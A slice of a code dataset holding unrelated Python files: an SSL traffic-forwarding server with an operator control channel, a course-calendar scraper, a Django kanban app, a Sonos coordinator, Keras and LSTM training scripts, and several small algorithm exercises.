writer.close()\n s_writer.close()\n break\n else:\n pass\n s_writer.write(data)\n await s_writer.drain()\n print(str(client_addr) + '正在给' + str(server_addr) + '发送信息:' + data.decode())\n try:\n re_msg = await s_reader.read(1024)\n print('已收到' + str(server_addr) + '的回复:\\n' + re_msg.decode())\n try:\n writer.write(re_msg)\n await writer.drain()\n print('成功给' + str(client_addr) + '发送回复:\\n' + re_msg.decode())\n except Exception as e:\n print('5',e)\n except Exception as e:\n print('6',e)\n else:\n print(\"请求失败,连接已断开!\")\n except ConnectionResetError:\n message = 'Force Disconnect'\n l_writer.write(message.encode())\n await l_writer.drain()\n l_writer.close()\n # user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n print('用户已断开连接:', client_addr)\n writer.close()\n\n except ssl.SSLError as e:\n pass\n\n\nasync def get_general_control():\n reader, writer = await asyncio.open_connection(Operat_server_IP[0], Operat_server_Port[0])\n while True:\n cmd = await reader.read(100)\n cmd = cmd.decode()\n if cmd == '1' or cmd == 'find -all':\n user_info = []\n for user in user_list:\n user_info.append(user_list[user]['addr'])\n re_cmd = transfer_json(user_info, True)\n writer.write(re_cmd.encode())\n await writer.drain()\n elif cmd == '2' or cmd == 'break -all':\n for user in user_list:\n try:\n user_writer = user_list[user]['Writer']\n user_writer.write('exit'.encode())\n await writer.drain()\n user_writer.close()\n print('已断开用户连接:', user_list[user]['addr'])\n except Exception as e:\n print('7',e)\n user_list.clear()\n writer.write('-----全部关闭成功-----'.encode())\n await writer.drain()\n else:\n writer.write('-----命令有误!请重试-----'.encode())\n await writer.drain()\n\n\nasync def main():\n ssl_server = creat_server_ssl()\n server = await asyncio.start_server(handle_echo, Server_Ip[0], Server_Port[0], ssl=ssl_server)\n # server.socket返回内部的服务器套接字列表副本\n addr = server.sockets[0].getsockname()\n print('成功开启服务器:', addr)\n print('等待客户端连接...\\n')\n\n try:\n await get_general_control()\n except Exception as e:\n print('8',e)\n\n async with server:\n # 开始接受连接,直到协程被取消。 serve_forever 任务的取消将导致服务器被关闭。\n await server.serve_forever()\n\n\ndef open_agent_server():\n asyncio.run(main())\n\n\ncon, cur = create_sqlite_db()\n\n\nif __name__ == '__main__':\n open_agent_server()\n","sub_path":"8_1/traffic_forwarding/server/server/TCP_echo_server.py","file_name":"TCP_echo_server.py","file_ext":"py","file_size_in_byte":14043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"318700577","text":"\nlines = []\nwith open('3.txt', 'r', encoding = 'utf-8-sig') as f:\n\tfor line in f:\n\t\tlines.append(line.strip())\n\nfor line in lines:\n\ts = line.split(' ')\n\t# 假如s[0] = 13:34Allen, 可以寫s[0][:5]來取出字串的部分內容 => s[0][:5] = 13:34\n\t# s[0][2:4] = :3 , s[0][-2:] = en , s[0][:-2] = 13:34All , s[0][-5:-2] = All\n\t# \"字串\"可以當作\"清單\"來看待\n\ttime = s[0][:5]\n\tname = s[0][5:]\n\tprint(name)","sub_path":"r3.py","file_name":"r3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"540825479","text":"import urllib\n\n \n\ndef clean(hur):\n\n ex = hur.find(\"<\")\n ass = ''\n lol = hur[ex:]\n ass = lol[:lol.find(\">\")+1]\n hur = hur.replace(ass, '')\n\n return hur\n\n \ndef n(the):\n ##Prereq Code\n ex = the.find(\"Prerequisite\")\n pre = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n pre = lol[:lol.find(\"
\")]\n\n ##Exclusion Code\n ex = the.find(\"Exclusion\")\n exs = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n exs = lol[:lol.find(\"
\")]\n\n ## Distibution\n ex = the.find(\"Distribution Requirement Status\")\n dis = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n dis = lol[:lol.find(\"
\")]\n\n ## Breadth\n ex = the.find(\"Breadth \")\n bre = ''\n lol = the[ex:]\n lol = lol.replace('\\n','')\n if (ex != -1 and len(the)!=0):\n bre = lol[:lol.find(\"
\")]\n\n ### Editing Prereq shit\n pre = pre.replace(\"\\r####\",'')\n exs = exs.replace(\"\\r####\",'')\n while pre.find('<')!=-1:\n pre = clean(pre)\n while exs.find('<')!=-1:\n exs = clean(exs)\n\n lol = []\n lol.append(pre)\n lol.append(exs)\n lol.append(dis)\n lol.append(bre)\n \n return lol\n\n\n\n\n\nurl = \"http://www.artsandscience.utoronto.ca/ofr/calendar/crs_csc.htm\"\nf = urllib.urlopen(url)\ncrc = (url[url.find(\"_\") + 1:url.rfind(\".\")]).upper() # Rip the course code from url and conver to upper case\n\n\ndef getProgramName(f):\n \n \n for i in range(0,23):\n x = f.readline()\n \n return(x[x.find(\">\") + 1 : x.rfind(\"<\")])\n\nprogramName = getProgramName(f)\n\nwhile (f.readline().find(programName + \" Courses\") == -1):\n f.readline()\ns = f.readline()\nattributes = []\ncourses = {}\nwhile (s):\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n if (z!=-1): \n Title = ((s[:s.find(\"\")])[(s[:s.find(\"\")]).rfind(\">\")+1:\n (s[:s.find(\"\")]).rfind(\"]\") + 1]).replace(\" \",\"\")\n description = s[s.find(\"

\") + 3 : s.find(\"

\")]\n crcode = crc + str(Title[3:6])\n \n \n s = f.readline()\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n x = ''\n while (not(z != - 1) and s!= \"\"): \n \n x = x + s +'####\\n'\n\n s = f.readline()\n z = (s.find(crc) and s.find(\"\") and s.find(\"[\") and s.find(\"]\")) \n courses[crcode] = [Title , description ,n(x)]\n else:\n s = f.readline()\n \n \n","sub_path":"uoft_coursecalendar_parser.py","file_name":"uoft_coursecalendar_parser.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"214150386","text":"import logging\nimport traceback\nimport Image\nimport ImageOps\nfrom pypes.component import Component\n\nlog = logging.getLogger(__name__)\n\nclass ImageMirror(Component):\n\n __metatype__ = 'TRANSFORMER'\n\n def __init__(self):\n Component.__init__(self)\n log.info('Component Initialized: %s' % self.__class__.__name__)\n\n def run(self):\n while True:\n\n # for each document waiting on our input port\n for doc in self.receive_all('in'):\n try:\n # grab the serialized image\n raw_image = doc.get('image_data')\n\n # grab the meta-data we need\n size = doc.get_meta('size', 'image_data')\n mode = doc.get_meta('mode', 'image_data')\n\n # deserialize the image content\n image = Image.fromstring(mode, size, raw_image)\n\n # perform the mirroring\n mirrored_image = ImageOps.mirror(image)\n\n # update the meta-data for the image\n doc.set_meta('size', mirrored_image.size, 'image_data')\n doc.set_meta('mode', mirrored_image.mode, 'image_data')\n\n # update the image_data with the new serialized payload\n doc.set('image_data', mirrored_image.tostring())\n\n except Exception as e:\n log.error('Component Failed: %s' % self.__class__.__name__)\n log.error('Reason: %s' % str(e)) \n log.debug(traceback.print_exc())\n\n # send the document to the next component\n self.send('out', doc)\n\n # yield the CPU, allowing another component to run\n self.yield_ctrl()\n\n","sub_path":"imagemirror/imagemirror/imagemirror.py","file_name":"imagemirror.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"509385385","text":"from queue import Queue\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n q = Queue()\n fresh = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j]==2:\n q.put((i,j))\n elif grid[i][j]==1:\n fresh = fresh + 1\n dirs =[[-1,0],[1,0],[0,1],[0,-1]]\n time = 0\n if fresh == 0:\n return time\n while(q.empty()!=True):\n size = q.qsize()\n for l in range(size):\n r,c = q.get()\n for k in dirs:\n row = r + k[0]\n column = c + k[1]\n if((row>=0 and row=0 and column ReLU => BN => Conv => ReLU => BN => POOL => Dropout layer\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(Conv2D(32, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(MaxPooling2D(strides=(2, 2)))\n\n model.add(Dropout(rate=0.25))\n\n # second set Conv => ReLU => BN => Conv => ReLU => BN => POOL layer\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n\n model.add(MaxPooling2D(strides=(2, 2)))\n\n model.add(Dropout(rate=0.25))\n\n # first set FC => ReLU => BN => Dropout\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(BatchNormalization(axis=chan_dim))\n model.add(Dropout(0.5))\n\n # softmax classifier\n model.add(Dense(classes, activation='softmax'))\n\n return model","sub_path":"StarterBundle/practice/pyimagesearch/nn/conv/minivggnet.py","file_name":"minivggnet.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"571383076","text":"def same_checker(i, j, entire_list, animals):\n count = 0\n a1 = entire_list[animals[i]]\n a2 = entire_list[animals[j]]\n\n for k in range(len(a1)):\n if a1[k] in a2:\n count+=1\n return count\n \nentire_list = dict()\nanimals = []\n\nwith open(\"guess.in\" , \"r\") as fin:\n numb_ani = int(fin.readline().strip())\n \n for i in range(numb_ani):\n list_arr = []\n \n line = fin.readline().strip().split(\" \")\n numb_of_chars = int(line[1])\n \n for j in range(numb_of_chars):\n list_arr.append(line[2+j])\n entire_list[line[0]] = list_arr\n animals.append(line[0])\n \n largest = 0\n for i in range(numb_ani):\n for j in range(i+1, numb_ani):\n largest = max(largest, same_checker(i, j, entire_list, animals))\n \nwith open(\"guess.out\", \"w\") as fout:\n fout.write(str(largest+1))","sub_path":"jan_contest/prob_3/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"53783367","text":"\"\"\"Coursitter URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom app import views\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('login/', views.login_view),\n path('logout/',views.logout_view),\n path('', views.userMain),\n path('searchCourse/', views.searchCourseDeal),\n path('searchLabel/', views.seachLableDeal),\n path('allCourse/', views.allCourse),\n path('classADD/', views.addClassDeal),\n path('classDELETE/', views.deleteClassDeal),\n path('checkClass/', views.checkClassDeal),\n path('getHistory/', views.getHistory)\n]\n","sub_path":"Coursitter/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"270565891","text":"from django import forms\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.contrib.messages.storage import session\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import CreateView, DeleteView, ListView, UpdateView\nfrom rest_framework import generics, renderers, viewsets\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom .forms import CardCreateForm, CardUpdateForm, SignUpForm\nfrom .models import Card\nfrom .serializers import CardSerializer, CardStatusSerializer\n\n\nclass SignUpView(CreateView):\n\n\n form_class = SignUpForm\n success_url = reverse_lazy('index')\n template_name = 'signup.html'\n\n def form_valid(self, form):\n valid = super(SignUpView, self).form_valid(form)\n username, password = form.cleaned_data.get('username'), form.cleaned_data.get('password1')\n new_user = authenticate(username=username, password=password)\n login(self.request, new_user)\n return valid\n\nclass CardCreateView(CreateView):\n\n\n model = Card\n success_url = '/'\n template_name = 'index.html'\n form_class = CardCreateForm\n\n def form_valid(self, form):\n\n card_name = form.cleaned_data.get('name')\n card_description = form.cleaned_data.get('description')\n card_assignee = form.cleaned_data.get('assignee')\n if card_assignee == None:\n Card.objects.create(name=card_name, description=card_description, creator=self.request.user)\n else:\n card_assignee = User.objects.get(username=form.cleaned_data.get('assignee'))\n Card.objects.create(name=card_name, description=card_description, creator=self.request.user, assignee=card_assignee)\n messages.success(self.request, f'The card \"{card_name}\" has been created and assigned to \"{card_assignee}\"!')\n return redirect('index')\n\nclass CardUpdateView(UpdateView):\n\n\n model = Card\n template_name = \"update.html\"\n success_url = '/'\n form_class = CardUpdateForm\n\n def get_form(self, form_class=None):\n\n self.object = self.get_object()\n if form_class is None:\n form_class = self.get_form_class()\n form = form_class(**self.get_form_kwargs())\n if (self.request.user.is_superuser == False) and (self.request.user != self.object.creator):\n form.fields['name'].widget.attrs['readonly'] = 'readonly'\n form.fields['name'].widget.attrs['disabled'] = 'disabled'\n form.fields['description'].widget.attrs['readonly'] = 'readonly'\n form.fields['description'].widget.attrs['disabled'] = 'disabled'\n form.fields['assignee'].widget.attrs['readonly'] = 'readonly'\n form.fields['assignee'].widget.attrs['disabled'] = 'disabled'\n\n return form\n\n def get_form_kwargs(self):\n\n kwargs = super(CardUpdateView, self).get_form_kwargs()\n\n if self.request.user.is_superuser == False:\n kwargs.update({'queryset': User.objects.filter(username=self.request.user)})\n else:\n kwargs.update({'queryset': User.objects.all()})\n return kwargs\n\n def get_context_data(self, **kwargs):\n context = {}\n if self.object:\n context['object'] = self.object\n context['card_creator'] = self.object.creator\n context_object_name = self.get_context_object_name(self.object)\n if context_object_name:\n context[context_object_name] = self.object\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def post(self, request, *args, **kwargs):\n\n self.object = self.get_object()\n self.object.date_edited = timezone.now()\n self.object.save()\n\n if request.is_ajax():\n elm_id = request.POST['element_id']\n card_id = request.POST['card_id']\n user_object = request.POST['user_object']\n user = User.objects.get(username=user_object)\n card = Card.objects.get(id=card_id)\n if not user.is_superuser:\n if card.assignee == user:\n if elm_id != \"DN\":\n card.status = elm_id\n card.date_edited = timezone.now()\n card.save()\n else:\n messages.error(self.request, f'You are not permitted to move cards to Done column!')\n else:\n messages.error(self.request, f'You cannot move cards assigned to other users!')\n else:\n if (card.status == \"RD\" or card.status == \"DN\") and (elm_id == \"RD\" or elm_id == \"DN\"):\n card.status = elm_id\n card.date_edited = timezone.now()\n card.save()\n else:\n messages.error(self.request, f'You can move cards only between Ready or Done columns!')\n\n return super().post(request, *args, **kwargs)\n\nclass CardDeleteView(DeleteView):\n\n\n model = Card\n template_name = 'index.html'\n success_url = '/'\n\n def delete(self, request, *args, **kwargs):\n\n messages.success(self.request, f'The card \"{self.get_object().name}\" has been successfully deleted!')\n return super(CardDeleteView, self).delete(request, *args, **kwargs)\n\nclass IndexListView(ListView):\n\n\n model = Card\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super(IndexListView, self).get_context_data(**kwargs)\n context['form'] = CardCreateForm(request=self.request)\n context['new_list'] = Card.objects.filter(status=\"NW\")\n context['in_progress_list'] = Card.objects.filter(status=\"INP\")\n context['in_qa_list'] = Card.objects.filter(status=\"INQ\")\n context['ready_list'] = Card.objects.filter(status=\"RD\")\n context['done_list'] = Card.objects.filter(status=\"DN\")\n context['users_list'] = User.objects.all()\n return context\n\nclass CardViewSet(viewsets.ModelViewSet):\n\n\n queryset = Card.objects.all()\n serializer_class = CardSerializer\n\nclass CardList(generics.ListAPIView):\n\n\n serializer_class = CardStatusSerializer\n\n def get_queryset(self):\n\n queryset = Card.objects.all()\n status = self.request.query_params.get('status', None)\n if status is not None:\n queryset = queryset.filter(status=status)\n return queryset\n","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324721046","text":"\"\"\"\n题目:给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n例子:输入: \"()[]{}\" 输出: true 输入: \"{[]}\" 输出: true\n日期:2018/10/20\n\"\"\"\n\n\nclass Solution:\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n rule = {'(': 1, '[': 2, '{': 3, ')': -1, ']': -2, '}': -3}\n for ch in s:\n if rule[ch] < 0 and len(stack) == 0: return False\n if rule[ch] > 0: stack.append(ch)\n if rule[ch] < 0 and rule[stack.pop()] != -rule[ch]: return False\n if len(stack) == 0: return True\n else: return False\n\n\nsolution = Solution()\nprint(solution.isValid('(([]){})'))\n","sub_path":"day10/isValid.py","file_name":"isValid.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127148838","text":"\"\"\"Class representing a Sonos household storage helper.\"\"\"\nfrom __future__ import annotations\n\nfrom collections import deque\nfrom collections.abc import Callable, Coroutine\nimport logging\nfrom typing import Any\n\nfrom pysonos import SoCo\n\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers.debounce import Debouncer\n\nfrom .const import DATA_SONOS\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass SonosHouseholdCoordinator:\n \"\"\"Base class for Sonos household-level storage.\"\"\"\n\n def __init__(self, hass: HomeAssistant, household_id: str) -> None:\n \"\"\"Initialize the data.\"\"\"\n self.hass = hass\n self.household_id = household_id\n self._processed_events = deque(maxlen=5)\n self.async_poll: Callable[[], Coroutine[None, None, None]] | None = None\n\n def setup(self, soco: SoCo) -> None:\n \"\"\"Set up the SonosAlarm instance.\"\"\"\n self.update_cache(soco)\n self.hass.add_job(self._async_create_polling_debouncer)\n\n async def _async_create_polling_debouncer(self) -> None:\n \"\"\"Create a polling debouncer in async context.\n\n Used to ensure redundant poll requests from all speakers are coalesced.\n \"\"\"\n self.async_poll = Debouncer(\n self.hass,\n _LOGGER,\n cooldown=3,\n immediate=False,\n function=self._async_poll,\n ).async_call\n\n async def _async_poll(self) -> None:\n \"\"\"Poll any known speaker.\"\"\"\n discovered = self.hass.data[DATA_SONOS].discovered\n\n for uid, speaker in discovered.items():\n _LOGGER.debug(\"Updating %s using %s\", type(self).__name__, speaker.soco)\n success = await self.async_update_entities(speaker.soco)\n\n if success:\n # Prefer this SoCo instance next update\n discovered.move_to_end(uid, last=False)\n break\n\n @callback\n def async_handle_event(self, event_id: str, soco: SoCo) -> None:\n \"\"\"Create a task to update from an event callback.\"\"\"\n if event_id in self._processed_events:\n return\n self._processed_events.append(event_id)\n self.hass.async_create_task(self.async_update_entities(soco))\n\n async def async_update_entities(self, soco: SoCo) -> bool:\n \"\"\"Update the cache and update entities.\"\"\"\n raise NotImplementedError()\n\n def update_cache(self, soco: SoCo) -> Any:\n \"\"\"Update the cache of the household-level feature.\"\"\"\n raise NotImplementedError()\n","sub_path":"homeassistant/components/sonos/household_coordinator.py","file_name":"household_coordinator.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211107890","text":"import os\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nimport time\n# import matplotlib.pyplot as plt\n# import warnings\n\nimport keras\nfrom keras.preprocessing import sequence\nimport tensorflow as tf\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n# assertion packages\n\nfrom utils import display_exec_time\nfrom processing.marsdataloader import MARSDataLoader\n\nimport argparse\n\n# Control for random states\nimport random\n\nSEED = 2020\nos.environ['PYTHONHASHSEED'] = str(SEED)\nrandom.seed(SEED) # `python` built-in pseudo-random generator\nnp.random.seed(SEED) # numpy pseudo-random generator\ntf.set_random_seed(SEED) # tensorflow pseudo-random generator\n\n# # set session after random seeds according to https://github.com/tensorflow/tensorflow/issues/18323\n# sess = tf.Session(graph=tf.get_default_graph, config=tf.ConfigProto())\n# keras.backend.set_session(sess)\n\n# define format for saving tests TODO add destabilizing deflection file name\nTRAIN_PATH_X = \"data/data_{}ms/{}scale_{}ahead_train_X{}.npy\"\nTRAIN_PATH_Y = \"data/data_{}ms/{}scale_{}ahead_train_y{}.npy\"\nTEST_PATH_X = \"data/data_{}ms/{}scale_{}ahead_test_X{}.npy\"\nTEST_PATH_Y = \"data/data_{}ms/{}scale_{}ahead_test_y{}.npy\"\n\nCALCULATED = \"_calc\"\nORIGINAL = \"_orig\"\n\n\n# Argparser\n# noinspection PyTypeChecker\nargparser = argparse.ArgumentParser(prog=\"LSTM Trainer Argparser\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nargparser.add_argument(\n '--window', type=float, default=1.0, help='time scale of training data, in seconds')\nargparser.add_argument(\n '--ahead', type=float, default=0.5, help='prediction timing ahead of event, in seconds')\nargparser.add_argument(\n '--cal_vel', action='store_true', help='whether to use calculated velocity instead of original')\nargparser.add_argument(\n '--early_stop', action='store_true', help='whether to stop early training when converged')\nargparser.add_argument(\n '--patience', type=int, default=3, help='max number of epochs allowed with no improvement, if early stopping')\nargparser.add_argument(\n '--conv_crit', type=str.lower, default='loss', choices=['loss'],\n help='type of convergence criteria') # TODO explore more crit\n\nargs = argparser.parse_args()\n\n# convert seconds to ms\nwindow_ms = int(args.window * 1000)\nahead_ms = int(args.ahead * 1000)\nuse_calculated = args.cal_vel\nearly_stopping = args.early_stop\npatience_epochs = args.patience\nconv_criteria = args.conv_crit\n\n# print training info\nprint(\"Training information:\")\nprint(f\"Now training model with {window_ms}ms scale, {ahead_ms}ms ahead.\\n\"\n f\"Using calculated weight? {use_calculated}\\n\"\n f\"Early Stopping? {early_stopping}\\n\")\n\nif early_stopping:\n print(f\"Stopping early if no {conv_criteria} improvement in {patience_epochs} epochs.\\n\")\n\nif use_calculated:\n print(\"Using calculated velocity...\")\n\n\n#### Begin script\n# confirm TensorFlow sees the GPU\n# assert 'GPU' in str(device_lib.list_local_devices()), \"TensorFlow cannot find GPU\"\n#\n# # confirm Keras sees the GPU (for TensorFlow 1.X + Keras)\n# assert len(tensorflow_backend._get_available_gpus()) > 0, \"Keras cannot find GPU\"\n\n### time the script\nbegin = time.time()\n\n# TODO start change here: set window - ahead - rolling as positional arguments instead!\n# loader = MARSDataLoader(args.window, args.ahead, args.)\n\ndef load_sets_after_split(ahead_ms, scale_ms, mode=ORIGINAL):\n if mode not in (CALCULATED, ORIGINAL):\n raise ValueError(\"Unknown velocity mode: {}\".format(mode))\n\n return map(lambda format_path: np.load(open(format_path.format(scale_ms, ahead_ms, scale_ms, mode), \"rb\")),\n (TRAIN_PATH_X, TEST_PATH_X, TRAIN_PATH_Y, TEST_PATH_Y))\n\ndef save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, scale_ms, mode=ORIGINAL):\n if mode not in (CALCULATED, ORIGINAL):\n raise ValueError(\"Unknown velocity mode: {}\".format(mode))\n for format_path, arr in ((TRAIN_PATH_X, X_train), (TEST_PATH_X, X_test), (TRAIN_PATH_Y, y_train), (TEST_PATH_Y, y_test)):\n path = format_path.format(scale_ms, ahead_ms, scale_ms, mode)\n np.save(path, arr)\n print(\"array saved at {}\".format(path))\n # map(lambda format_path, arr: np.save(open(format_path.format(scale_ms, ahead_ms, scale_ms, mode), \"wb\"), arr), #TODO what's wrong??\n # ((TRAIN_PATH_X, X_train), (TEST_PATH_X, X_test), (TRAIN_PATH_Y, y_train), (TEST_PATH_Y, y_test)))\n\n\n# Now, save model and training stats\n# ensure output folder exists\nif not os.path.exists(f\"results/results_{window_ms}\"):\n os.makedirs(f'results/results_{window_ms}')\n\ntry:\n if use_calculated:\n X_train, X_test, y_train, y_test = load_sets_after_split(ahead_ms, window_ms, mode=CALCULATED)\n else:\n X_train, X_test, y_train, y_test = load_sets_after_split(ahead_ms, window_ms)\n\nexcept:\n print(\"did not find train and test files... now generating...\")\n #### read all the positive samples TODO merge these paths with generate data (use 1 var and avoid hard coding)\n crash_featurized = pd.read_pickle(f'data/data_{window_ms}ms/crash_feature_label_{ahead_ms}ahead_{window_ms}scale_test')\n\n ### read all the negative samples\n noncrash_featurized = pd.read_pickle(f'data/data_{window_ms}ms/noncrash_feature_label_{ahead_ms}ahead_{window_ms}scale_test')\n\n #### merge both positive and negative together\n data_final = pd.concat([crash_featurized, noncrash_featurized])\n data_final = data_final[['features_cal_vel','features_org_vel','label']]\n\n\n #### split the data with calculated velocity and original velocity seperately\n\n ### calculated velocity\n # X_cal = data_final.features_cal_vel\n # X_cal = np.array([np.vstack(i) for i in X_cal])\n\n\n ### original velocity\n # choose velocity TODO change this to before loading data\n if use_calculated:\n X_all = np.array(data_final.features_cal_vel.to_list())\n else:\n X_all = np.array(data_final.features_org_vel.to_list())\n\n # X_all = np.array([np.vstack(i) for i in X_all])\n print(\"X_all shape: {}\".format(X_all.shape))\n\n # y_all = np.array(data_final.label)\n\n y_all = data_final.label.to_numpy().reshape(-1, 1)\n print(\"y_all shape: {}\".format(y_all.shape))\n print(f\"Total crash instances: {np.count_nonzero(y_all == 1)}\")\n # X_train_cal, X_test_cal, y_train_cal, y_test_cal = train_test_split(X_cal, y, test_size=0.2, random_state=42)\n\n X_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.2, random_state=SEED)\n\n if use_calculated:\n save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, window_ms, mode=CALCULATED)\n else:\n save_sets_after_split(X_train, X_test, y_train, y_test, ahead_ms, window_ms)\n\nprint(\"X_train shape: {}\".format(X_train.shape))\nprint(\"y_train shape: {}\".format(y_train.shape))\nprint(\"X_test shape: {}\".format(X_test.shape))\nprint(\"y_test shape: {}\".format(y_test.shape))\n##### make data into sequence for training\n\n### calculated velocity\n# X_train_cal = sequence.pad_sequences(X_train_cal, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_train_cal = np.array(y_train_cal).reshape(len(y_train_cal),1)\n\n# X_test_cal = sequence.pad_sequences(X_test_cal, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_test_cal = np.array(y_test_cal).reshape(len(y_test_cal),1)\n\nprint(\"Processing Data...\")\n\n# pad sequences TODO trains don't need to be aligned?\nX_train = sequence.pad_sequences(X_train, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_train = y_train.reshape(-1, 1)\n\nX_test = sequence.pad_sequences(X_test, maxlen=50, padding='post', dtype='float', truncating='post')\n# y_test = y_test.reshape(-1, 1)\n\n\n#### onehotecoder\nenc = OneHotEncoder(handle_unknown='ignore', sparse=False)\nenc = enc.fit(y_train)\ny_train = enc.transform(y_train)\ny_test = enc.transform(y_test)\n\nprint(\"After padding X and OH encoding y...\")\nprint(\"X_train shape: {}\".format(X_train.shape))\nprint(\"y_train shape: {}\".format(y_train.shape))\nprint(\"X_test shape: {}\".format(X_test.shape))\nprint(\"y_test shape: {}\".format(y_test.shape))\n\n\n### train model\n\nclass_weights = [{\n 0:1,\n 1:1\n},\n{\n 0:1,\n 1:10\n},\n{\n 0:1,\n 1:50\n}]\n\n### try different weights\nfor i in range(len(class_weights)):\n print(f'---------Now training model with class weight {class_weights[i][0]}to{class_weights[i][1]}-------------')\n # initialize new model for this setting\n model = keras.Sequential()\n model.add(\n keras.layers.LSTM(\n units=128,\n input_shape=[X_train.shape[1], X_train.shape[2]]\n )\n )\n\n model.add(keras.layers.Dropout(rate=0.5, seed=SEED))\n model.add(keras.layers.Dense(units=128, activation='relu'))\n model.add(keras.layers.Dense(y_train.shape[1], activation='softmax'))\n model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['categorical_accuracy']\n )\n\n # early stopping to save up GPU, stops training when there's no loss reduction in 4 epochs\n if early_stopping:\n callback = tf.keras.callbacks.EarlyStopping(monitor=conv_criteria, patience=patience_epochs)\n history = model.fit(\n X_train, y_train,\n epochs=30,\n batch_size=32,\n validation_split=0.1,\n shuffle=False,\n class_weight = class_weights[i],\n callbacks=[callback]\n )\n else:\n history = model.fit(\n X_train, y_train,\n epochs=30,\n batch_size=32,\n validation_split=0.1,\n shuffle=False,\n class_weight=class_weights[i]\n )\n\n model.evaluate(X_test, y_test)\n y_pred = model.predict(X_test)\n\n\n predictions_org = y_pred[:, 0]\n predictions_org[predictions_org>=0.5] = 1\n predictions_org[predictions_org<0.5] = 0\n\n testing_org = y_test[:, 0]\n\n ### confusion matrix\n cf_array = confusion_matrix(testing_org, predictions_org)\n\n ### save the results with accuracy, recall, precision\n df_resutls = pd.DataFrame(cf_array)\n ### accuracy\n df_resutls['accuracy'] = (df_resutls.iloc[0,0] + df_resutls.iloc[1,1])/np.sum(cf_array)\n ### recall\n df_resutls['recall'] = df_resutls.iloc[0,0]/(df_resutls.iloc[0,0] + df_resutls.iloc[0,1])\n ### precision\n df_resutls['precision'] = df_resutls.iloc[0,0]/(df_resutls.iloc[0,0] + df_resutls.iloc[1,0])\n\n\n # save model to path, can be loaded with, e.g., reconstructed_model = keras.models.load_model(path_to_folder)\n 